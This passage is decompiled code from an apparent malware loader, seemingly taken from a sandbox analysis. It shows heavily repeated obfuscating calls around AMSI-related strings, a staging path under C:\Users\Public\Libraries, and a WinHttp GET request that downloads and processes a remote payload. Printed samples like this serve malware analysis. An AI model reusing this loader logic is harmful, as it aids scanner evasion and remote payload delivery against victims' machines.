                                                                                                  					E02854698( &_v164, E02854964(_v168));
                                                                                                  					_pop(_t5161);
                                                                                                  					E02867B80(_v164, _t5161);
                                                                                                  					E028544F4(0x28a6578, "iexpress.exe");
                                                                                                  				} else {
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("ScanString");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v140, E02854964(_v144));
                                                                                                  					_push(_v140);
                                                                                                  					_t5112 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v152, _t5112, 0x2874c4c);
                                                                                                  					E02854698( &_v148, E02854964(_v152));
                                                                                                  					_pop(_t6271); // executed
                                                                                                  					E02867B80(_v148, _t6271); // executed
                                                                                                  					_t6272 =  *0x28a659c; // 0x28c40a8
                                                                                                  					E028544F4(0x28a6578, _t6272);
                                                                                                  				}
                                                                                                  				E0285C348(0,  &_v172);
                                                                                                  				E028544F4(0x28a6558, _v172);
                                                                                                  				_push(0x2874c4c);
                                                                                                  				_push( *0x28a65fc);
                                                                                                  				_push("UacScan");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v176, E02854964(_v180));
                                                                                                  				_push(_v176);
                                                                                                  				_t4910 =  *0x28a65fc; // 0x29f1b38
                                                                                                  				E028547B0( &_v188, _t4910, 0x2874c4c);
                                                                                                  				E02854698( &_v184, E02854964(_v188));
                                                                                                  				_pop(_t5169); // executed
                                                                                                  				E02867B80(_v184, _t5169); // executed
                                                                                                  				_push(0x2874c4c);
                                                                                                  				_push( *0x28a65fc);
                                                                                                  				_push("Initialize");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v192, E02854964(_v196));
                                                                                                  				_push(_v192);
                                                                                                  				_t4911 =  *0x28a65fc; // 0x29f1b38
                                                                                                  				E028547B0( &_v204, _t4911, 0x2874c4c);
                                                                                                  				E02854698( &_v200, E02854964(_v204));
                                                                                                  				_pop(_t5174); // executed
                                                                                                  				E02867B80(_v200, _t5174); // executed
                                                                                                  				_push(0x2874c4c);
                                                                                                  				_push( *0x28a65fc);
                                                                                                  				_push("UacInitialize");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v208, E02854964(_v212));
                                                                                                  				_push(_v208);
                                                                                                  				_t4912 =  *0x28a65fc; // 0x29f1b38
                                                                                                  				E028547B0( &_v220, _t4912, 0x2874c4c);
                                                                                                  				E02854698( &_v216, E02854964(_v220));
                                                                                                  				_pop(_t5179); // executed
                                                                                                  				E02867B80(_v216, _t5179); // executed
                                                                                                  				_push(0x2874c4c);
                                                                                                  				_push( *0x28a65fc);
                                                                                                  				_push("ScanString");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v224, E02854964(_v228));
                                                                                                  				_push(_v224);
                                                                                                  				_t4913 =  *0x28a65fc; // 0x29f1b38
                                                                                                  				E028547B0( &_v236, _t4913, 0x2874c4c);
                                                                                                  				E02854698( &_v232, E02854964(_v236));
                                                                                                  				_pop(_t5184); // executed
                                                                                                  				E02867B80(_v232, _t5184); // executed
                                                                                                  				E028544F4(0x28a65d0, "C:\\Users\\Public\\Libraries");
                                                                                                  				_push(0x2874c4c);
                                                                                                  				_push( *0x28a65fc);
                                                                                                  				_push("Initialize");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v240, E02854964(_v244));
                                                                                                  				_push(_v240);
                                                                                                  				_t4914 =  *0x28a65fc; // 0x29f1b38
                                                                                                  				E028547B0( &_v252, _t4914, 0x2874c4c);
                                                                                                  				E02854698( &_v248, E02854964(_v252));
                                                                                                  				_pop(_t5190); // executed
                                                                                                  				E02867B80(_v248, _t5190); // executed
                                                                                                  				_push(0x2874c4c);
                                                                                                  				_push( *0x28a65fc);
                                                                                                  				_push("ScanBuffer");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v256, E02854964(_v260));
                                                                                                  				_push(_v256);
                                                                                                  				_t4915 =  *0x28a65fc; // 0x29f1b38
                                                                                                  				E028547B0( &_v268, _t4915, 0x2874c4c);
                                                                                                  				E02854698( &_v264, E02854964(_v268));
                                                                                                  				_pop(_t5195); // executed
                                                                                                  				E02867B80(_v264, _t5195); // executed
                                                                                                  				_push(0x2874c4c);
                                                                                                  				_push( *0x28a65fc);
                                                                                                  				_push("OpenSession");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v272, E02854964(_v276));
                                                                                                  				_push(_v272);
                                                                                                  				_t4916 =  *0x28a65fc; // 0x29f1b38
                                                                                                  				E028547B0( &_v284, _t4916, 0x2874c4c);
                                                                                                  				E02854698( &_v280, E02854964(_v284));
                                                                                                  				_pop(_t5200); // executed
                                                                                                  				E02867B80(_v280, _t5200);
                                                                                                  				_t1978 =  *0x28a6548; // 0x0
                                                                                                  				E02854698( &_v288, E02854964(_t1978));
                                                                                                  				_t1983 = E02857E40(_v288);
                                                                                                  				_t6284 = _t1983;
                                                                                                  				if(_t1983 == 0) {
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("UacScan");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v500, E02854964(_v504));
                                                                                                  					_push(_v500);
                                                                                                  					_t4917 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v512, _t4917, 0x2874c4c);
                                                                                                  					E02854698( &_v508, E02854964(_v512));
                                                                                                  					_pop(_t5206); // executed
                                                                                                  					E02867B80(_v508, _t5206); // executed
                                                                                                  					E028544F4(0x28a65ec, 0x2874d2c);
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("OpenSession");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v516, E02854964(_v520));
                                                                                                  					_push(_v516);
                                                                                                  					_t4918 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v528, _t4918, 0x2874c4c);
                                                                                                  					E02854698( &_v524, E02854964(_v528));
                                                                                                  					_pop(_t5212); // executed
                                                                                                  					E02867B80(_v524, _t5212); // executed
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("ScanBuffer");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v532, E02854964(_v536));
                                                                                                  					_push(_v532);
                                                                                                  					_t4919 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v544, _t4919, 0x2874c4c);
                                                                                                  					E02854698( &_v540, E02854964(_v544));
                                                                                                  					_pop(_t5217); // executed
                                                                                                  					E02867B80(_v540, _t5217); // executed
                                                                                                  					_t5218 =  *0x28a6558; // 0x7f200018
                                                                                                  					E02854DA4( &_v552, _t5218);
                                                                                                  					E0286BDD8(_v552, 0x28a65d4,  &_v548, _t6275); // executed
                                                                                                  					E028544F4(0x28a65cc, _v548);
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("OpenSession");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v556, E02854964(_v560));
                                                                                                  					_push(_v556);
                                                                                                  					_t4920 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v568, _t4920, 0x2874c4c);
                                                                                                  					E02854698( &_v564, E02854964(_v568));
                                                                                                  					_pop(_t5225); // executed
                                                                                                  					E02867B80(_v564, _t5225); // executed
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("ScanString");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v572, E02854964(_v576));
                                                                                                  					_push(_v572);
                                                                                                  					_t4921 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v584, _t4921, 0x2874c4c);
                                                                                                  					E02854698( &_v580, E02854964(_v584));
                                                                                                  					_pop(_t5230); // executed
                                                                                                  					E02867B80(_v580, _t5230); // executed
                                                                                                  					_t2062 =  *0x28a65cc; // 0x7faf0018, executed
                                                                                                  					E0286BF30(_t2062, 0x28a65d4,  &_v588, 0x2874d38, _t6274, _t6275); // executed
                                                                                                  					_t4923 =  *0x286bc00; // 0x286bc04
                                                                                                  					E028557DC(0x28a65d4, _t4923, _v588);
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("ScanBuffer");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v592, E02854964(_v596));
                                                                                                  					_push(_v592);
                                                                                                  					_t4924 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v604, _t4924, 0x2874c4c);
                                                                                                  					E02854698( &_v600, E02854964(_v604));
                                                                                                  					_pop(_t5237); // executed
                                                                                                  					E02867B80(_v600, _t5237); // executed
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("Initialize");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v608, E02854964(_v612));
                                                                                                  					_push(_v608);
                                                                                                  					_t4925 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v620, _t4925, 0x2874c4c);
                                                                                                  					E02854698( &_v616, E02854964(_v620));
                                                                                                  					_pop(_t5242); // executed
                                                                                                  					E02867B80(_v616, _t5242); // executed
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("ScanString");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v624, E02854964(_v628));
                                                                                                  					_push(_v624);
                                                                                                  					_t4926 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v636, _t4926, 0x2874c4c);
                                                                                                  					E02854698( &_v632, E02854964(_v636));
                                                                                                  					_pop(_t5247); // executed
                                                                                                  					E02867B80(_v632, _t5247); // executed
                                                                                                  					E028544F4(0x28a656c,  *((intOrPtr*)( *0x28a65d4 + 4)));
                                                                                                  					E028544F4(0x28a6590,  *((intOrPtr*)( *0x28a65d4 + 8)));
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("OpenSession");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v640, E02854964(_v644));
                                                                                                  					_push(_v640);
                                                                                                  					_t4927 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v652, _t4927, 0x2874c4c);
                                                                                                  					E02854698( &_v648, E02854964(_v652));
                                                                                                  					_pop(_t5256); // executed
                                                                                                  					E02867B80(_v648, _t5256); // executed
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("ScanBuffer");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v656, E02854964(_v660));
                                                                                                  					_push(_v656);
                                                                                                  					_t4928 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v668, _t4928, 0x2874c4c);
                                                                                                  					E02854698( &_v664, E02854964(_v668));
                                                                                                  					_pop(_t5261); // executed
                                                                                                  					E02867B80(_v664, _t5261);
                                                                                                  					_t2140 =  *0x28a6590; // 0x29f1b78
                                                                                                  					_t2141 = E0286BEB8(_t2140, 0x28a65d4, _t5261, _t6274, _t6275, __eflags, _t6295);
                                                                                                  					__eflags = _t2141 - 1;
                                                                                                  					if(_t2141 == 1) {
                                                                                                  						_push(0x2874c4c);
                                                                                                  						_push( *0x28a65fc);
                                                                                                  						_push("Initialize");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v672, E02854964(_v676));
                                                                                                  						_push(_v672);
                                                                                                  						_t5074 =  *0x28a65fc; // 0x29f1b38
                                                                                                  						E028547B0( &_v684, _t5074, 0x2874c4c);
                                                                                                  						E02854698( &_v680, E02854964(_v684));
                                                                                                  						_pop(_t6078); // executed
                                                                                                  						E02867B80(_v680, _t6078); // executed
                                                                                                  						_push(0x2874c4c);
                                                                                                  						_push( *0x28a65fc);
                                                                                                  						_push("ScanString");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v688, E02854964(_v692));
                                                                                                  						_push(_v688);
                                                                                                  						_t5075 =  *0x28a65fc; // 0x29f1b38
                                                                                                  						E028547B0( &_v700, _t5075, 0x2874c4c);
                                                                                                  						E02854698( &_v696, E02854964(_v700));
                                                                                                  						_pop(_t6083); // executed
                                                                                                  						E02867B80(_v696, _t6083);
                                                                                                  						_t4360 =  *0x28a6590; // 0x29f1b78
                                                                                                  						_t4361 = E02857AB0(_t4360, __eflags);
                                                                                                  						_t4362 =  *0x28a656c; // 0x29bf378
                                                                                                  						E0286C5D0(_t4362, 0x28a65d4,  &_v704, _t4361, _t6275);
                                                                                                  						E028544F4(0x28a6600, _v704);
                                                                                                  						_push(0x2874c4c);
                                                                                                  						_push( *0x28a65fc);
                                                                                                  						_push("OpenSession");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v708, E02854964(_v712));
                                                                                                  						_push(_v708);
                                                                                                  						_t5077 =  *0x28a65fc; // 0x29f1b38
                                                                                                  						E028547B0( &_v720, _t5077, 0x2874c4c);
                                                                                                  						E02854698( &_v716, E02854964(_v720));
                                                                                                  						_pop(_t6090); // executed
                                                                                                  						E02867B80(_v716, _t6090); // executed
                                                                                                  						_push(0x2874c4c);
                                                                                                  						_push( *0x28a65fc);
                                                                                                  						_push("ScanBuffer");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v724, E02854964(_v728));
                                                                                                  						_push(_v724);
                                                                                                  						_t5078 =  *0x28a65fc; // 0x29f1b38
                                                                                                  						E028547B0( &_v736, _t5078, 0x2874c4c);
                                                                                                  						E02854698( &_v732, E02854964(_v736));
                                                                                                  						_pop(_t6095); // executed
                                                                                                  						E02867B80(_v732, _t6095); // executed
                                                                                                  						_push(0x2874c4c);
                                                                                                  						_push( *0x28a65fc);
                                                                                                  						_push("OpenSession");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v740, E02854964(_v744));
                                                                                                  						_push(_v740);
                                                                                                  						_t5079 =  *0x28a65fc; // 0x29f1b38
                                                                                                  						E028547B0( &_v752, _t5079, 0x2874c4c);
                                                                                                  						E02854698( &_v748, E02854964(_v752));
                                                                                                  						_pop(_t6100); // executed
                                                                                                  						E02867B80(_v748, _t6100); // executed
                                                                                                  						_push(0x2874c4c);
                                                                                                  						_push( *0x28a65fc);
                                                                                                  						_push("UacScan");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v756, E02854964(_v760));
                                                                                                  						_push(_v756);
                                                                                                  						_t5080 =  *0x28a65fc; // 0x29f1b38
                                                                                                  						E028547B0( &_v768, _t5080, 0x2874c4c);
                                                                                                  						E02854698( &_v764, E02854964(_v768));
                                                                                                  						_pop(_t6105); // executed
                                                                                                  						E02867B80(_v764, _t6105); // executed
                                                                                                  						_push(0x2874c4c);
                                                                                                  						_push( *0x28a65fc);
                                                                                                  						_push("Initialize");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v772, E02854964(_v776));
                                                                                                  						_push(_v772);
                                                                                                  						_t5081 =  *0x28a65fc; // 0x29f1b38
                                                                                                  						E028547B0( &_v784, _t5081, 0x2874c4c);
                                                                                                  						E02854698( &_v780, E02854964(_v784));
                                                                                                  						_pop(_t6110); // executed
                                                                                                  						E02867B80(_v780, _t6110); // executed
                                                                                                  						_push(0x2874c4c);
                                                                                                  						_push( *0x28a65fc);
                                                                                                  						_push("ScanBuffer");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v788, E02854964(_v792));
                                                                                                  						_push(_v788);
                                                                                                  						_t5082 =  *0x28a65fc; // 0x29f1b38
                                                                                                  						E028547B0( &_v800, _t5082, 0x2874c4c);
                                                                                                  						E02854698( &_v796, E02854964(_v800));
                                                                                                  						_pop(_t6115); // executed
                                                                                                  						E02867B80(_v796, _t6115); // executed
                                                                                                  						_t4450 =  *0x28a6600; // 0x29bf4b0
                                                                                                  						_t4451 = E0286C4E4(_t4450, 0x2874d48);
                                                                                                  						__eflags = _t4451;
                                                                                                  						if(_t4451 != 0) {
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("ScanBuffer");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v804, E02854964(_v808));
                                                                                                  							_push(_v804);
                                                                                                  							_t5083 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v816, _t5083, 0x2874c4c);
                                                                                                  							E02854698( &_v812, E02854964(_v816));
                                                                                                  							_pop(_t6121); // executed
                                                                                                  							E02867B80(_v812, _t6121); // executed
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("OpenSession");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v820, E02854964(_v824));
                                                                                                  							_push(_v820);
                                                                                                  							_t5084 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v832, _t5084, 0x2874c4c);
                                                                                                  							E02854698( &_v828, E02854964(_v832));
                                                                                                  							_pop(_t6126); // executed
                                                                                                  							E02867B80(_v828, _t6126); // executed
                                                                                                  							_push(0); // executed
                                                                                                  							L0285CD94(); // executed
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("OpenSession");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v836, E02854964(_v840));
                                                                                                  							_push(_v836);
                                                                                                  							_t5085 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v848, _t5085, 0x2874c4c);
                                                                                                  							E02854698( &_v844, E02854964(_v848));
                                                                                                  							_pop(_t6131); // executed
                                                                                                  							E02867B80(_v844, _t6131); // executed
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("UacScan");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v852, E02854964(_v856));
                                                                                                  							_push(_v852);
                                                                                                  							_t5086 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v864, _t5086, 0x2874c4c);
                                                                                                  							E02854698( &_v860, E02854964(_v864));
                                                                                                  							_pop(_t6136); // executed
                                                                                                  							E02867B80(_v860, _t6136); // executed
                                                                                                  							E02866DC0("WinHttp.WinHttpRequest.5.1", 0x28a65d4,  &_v868, _t6274, _t6275, __eflags); // executed
                                                                                                  							E0286287C(0x28a655c, _v868);
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("OpenSession");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v872, E02854964(_v876));
                                                                                                  							_push(_v872);
                                                                                                  							_t5087 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v884, _t5087, 0x2874c4c);
                                                                                                  							E02854698( &_v880, E02854964(_v884));
                                                                                                  							_pop(_t6143); // executed
                                                                                                  							E02867B80(_v880, _t6143); // executed
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("ScanString");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v888, E02854964(_v892));
                                                                                                  							_push(_v888);
                                                                                                  							_t5088 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v900, _t5088, 0x2874c4c);
                                                                                                  							E02854698( &_v896, E02854964(_v900));
                                                                                                  							_pop(_t6148); // executed
                                                                                                  							E02867B80(_v896, _t6148); // executed
                                                                                                  							_push(0);
                                                                                                  							_push(0x28a6600);
                                                                                                  							E0285E3E0(0, 0x28a655c, 0x2874d80, "GET"); // executed
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("OpenSession");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v904, E02854964(_v908));
                                                                                                  							_push(_v904);
                                                                                                  							_t5089 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v916, _t5089, 0x2874c4c);
                                                                                                  							E02854698( &_v912, E02854964(_v916));
                                                                                                  							_pop(_t6153); // executed
                                                                                                  							E02867B80(_v912, _t6153); // executed
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("ScanBuffer");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v920, E02854964(_v924));
                                                                                                  							_push(_v920);
                                                                                                  							_t5090 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v932, _t5090, 0x2874c4c);
                                                                                                  							E02854698( &_v928, E02854964(_v932));
                                                                                                  							_pop(_t6158); // executed
                                                                                                  							E02867B80(_v928, _t6158); // executed
                                                                                                  							_push(0x2874d8c);
                                                                                                  							_push(0x28a655c);
                                                                                                  							_push(0); // executed
                                                                                                  							E0285E3E0(); // executed
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("OpenSession");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v936, E02854964(_v940));
                                                                                                  							_push(_v936);
                                                                                                  							_t5091 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v948, _t5091, 0x2874c4c);
                                                                                                  							E02854698( &_v944, E02854964(_v948));
                                                                                                  							_pop(_t6163); // executed
                                                                                                  							E02867B80(_v944, _t6163); // executed
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("ScanString");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v952, E02854964(_v956));
                                                                                                  							_push(_v952);
                                                                                                  							_t5092 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v964, _t5092, 0x2874c4c);
                                                                                                  							E02854698( &_v960, E02854964(_v964));
                                                                                                  							_pop(_t6168); // executed
                                                                                                  							E02867B80(_v960, _t6168); // executed
                                                                                                  							_push(0x2874d98);
                                                                                                  							_push(0x28a655c);
                                                                                                  							_push( &_v980); // executed
                                                                                                  							E0285E3E0(); // executed
                                                                                                  							_t6278 = _t6278 + 0x30;
                                                                                                  							E028617CC(0x28a658c, 0x28a65d4,  &_v980, _t6274, _t6275, _t6295); // executed
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("Initialize");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v984, E02854964(_v988));
                                                                                                  							_push(_v984);
                                                                                                  							_t5093 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v996, _t5093, 0x2874c4c);
                                                                                                  							E02854698( &_v992, E02854964(_v996));
                                                                                                  							_pop(_t6174); // executed
                                                                                                  							E02867B80(_v992, _t6174); // executed
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("ScanString");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v1000, E02854964(_v1004));
                                                                                                  							_push(_v1000);
                                                                                                  							_t5094 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v1012, _t5094, 0x2874c4c);
                                                                                                  							E02854698( &_v1008, E02854964(_v1012));
                                                                                                  							_pop(_t6179); // executed
                                                                                                  							E02867B80(_v1008, _t6179);
                                                                                                  							_t4630 =  *0x28a658c; // 0x7f530018
                                                                                                  							_v1016 = _t4630;
                                                                                                  							_t4631 = _v1016;
                                                                                                  							__eflags = _t4631;
                                                                                                  							if(_t4631 != 0) {
                                                                                                  								_t4692 = _t4631 - 4;
                                                                                                  								__eflags = _t4692;
                                                                                                  								_t4631 =  *_t4692;
                                                                                                  							}
                                                                                                  							__eflags = _t4631 - 0x7530;
                                                                                                  							if(_t4631 > 0x7530) {
                                                                                                  								_push(0x2874c4c);
                                                                                                  								_push( *0x28a65fc);
                                                                                                  								_push("OpenSession");
                                                                                                  								E02854824();
                                                                                                  								E02854698( &_v1020, E02854964(_v1024));
                                                                                                  								_push(_v1020);
                                                                                                  								_t5097 =  *0x28a65fc; // 0x29f1b38
                                                                                                  								E028547B0( &_v1032, _t5097, 0x2874c4c);
                                                                                                  								E02854698( &_v1028, E02854964(_v1032));
                                                                                                  								_pop(_t6194); // executed
                                                                                                  								E02867B80(_v1028, _t6194); // executed
                                                                                                  								_push(0x2874c4c);
                                                                                                  								_push( *0x28a65fc);
                                                                                                  								_push("ScanBuffer");
                                                                                                  								E02854824();
                                                                                                  								E02854698( &_v1036, E02854964(_v1040));
                                                                                                  								_push(_v1036);
                                                                                                  								_t5098 =  *0x28a65fc; // 0x29f1b38
                                                                                                  								E028547B0( &_v1048, _t5098, 0x2874c4c);
                                                                                                  								E02854698( &_v1044, E02854964(_v1048));
                                                                                                  								_pop(_t6199); // executed
                                                                                                  								E02867B80(_v1044, _t6199); // executed
                                                                                                  								_t4688 =  *0x28a658c; // 0x7f530018
                                                                                                  								E0286C8D8(_t4688, _t5098,  &_v1052);
                                                                                                  								E028544F4(0x28a65c8, _v1052);
                                                                                                  							}
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("Initialize");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v1056, E02854964(_v1060));
                                                                                                  							_push(_v1056);
                                                                                                  							_t5095 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v1068, _t5095, 0x2874c4c);
                                                                                                  							E02854698( &_v1064, E02854964(_v1068));
                                                                                                  							_pop(_t6184); // executed
                                                                                                  							E02867B80(_v1064, _t6184); // executed
                                                                                                  							_push(0x2874c4c);
                                                                                                  							_push( *0x28a65fc);
                                                                                                  							_push("UacScan");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v1072, E02854964(_v1076));
                                                                                                  							_push(_v1072);
                                                                                                  							_t5096 =  *0x28a65fc; // 0x29f1b38
                                                                                                  							E028547B0( &_v1084, _t5096, 0x2874c4c);
                                                                                                  							E02854698( &_v1080, E02854964(_v1084));
                                                                                                  							_pop(_t6189); // executed
                                                                                                  							E02867B80(_v1080, _t6189); // executed
                                                                                                  							L0285CD9C(); // executed
                                                                                                  						}
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("Initialize");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v292, E02854964(_v296));
                                                                                                  					_push(_v292);
                                                                                                  					_t5099 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v304, _t5099, 0x2874c4c);
                                                                                                  					E02854698( &_v300, E02854964(_v304));
                                                                                                  					_pop(_t6206);
                                                                                                  					E02867B80(_v300, _t6206);
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("OpenSession");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v308, E02854964(_v312));
                                                                                                  					_push(_v308);
                                                                                                  					_t5100 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v320, _t5100, 0x2874c4c);
                                                                                                  					E02854698( &_v316, E02854964(_v320));
                                                                                                  					_pop(_t6211);
                                                                                                  					E02867B80(_v316, _t6211);
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("ScanBuffer");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v324, E02854964(_v328));
                                                                                                  					_push(_v324);
                                                                                                  					_t5101 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v336, _t5101, 0x2874c4c);
                                                                                                  					E02854698( &_v332, E02854964(_v336));
                                                                                                  					_pop(_t6216);
                                                                                                  					E02867B80(_v332, _t6216);
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("Initialize");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v340, E02854964(_v344));
                                                                                                  					_push(_v340);
                                                                                                  					_t5102 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v352, _t5102, 0x2874c4c);
                                                                                                  					E02854698( &_v348, E02854964(_v352));
                                                                                                  					_pop(_t6221);
                                                                                                  					E02867B80(_v348, _t6221);
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("ScanBuffer");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v356, E02854964(_v360));
                                                                                                  					_push(_v356);
                                                                                                  					_t5103 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v368, _t5103, 0x2874c4c);
                                                                                                  					E02854698( &_v364, E02854964(_v368));
                                                                                                  					_pop(_t6226);
                                                                                                  					E02867B80(_v364, _t6226);
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("OpenSession");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v372, E02854964(_v376));
                                                                                                  					_push(_v372);
                                                                                                  					_t5104 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v384, _t5104, 0x2874c4c);
                                                                                                  					E02854698( &_v380, E02854964(_v384));
                                                                                                  					_pop(_t6231);
                                                                                                  					E02867B80(_v380, _t6231);
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("OpenSession");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v388, E02854964(_v392));
                                                                                                  					_push(_v388);
                                                                                                  					_t5105 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v400, _t5105, 0x2874c4c);
                                                                                                  					E02854698( &_v396, E02854964(_v400));
                                                                                                  					_pop(_t6236);
                                                                                                  					E02867B80(_v396, _t6236);
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("ScanBuffer");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v404, E02854964(_v408));
                                                                                                  					_push(_v404);
                                                                                                  					_t5106 =  *0x28a65fc; // 0x29f1b38
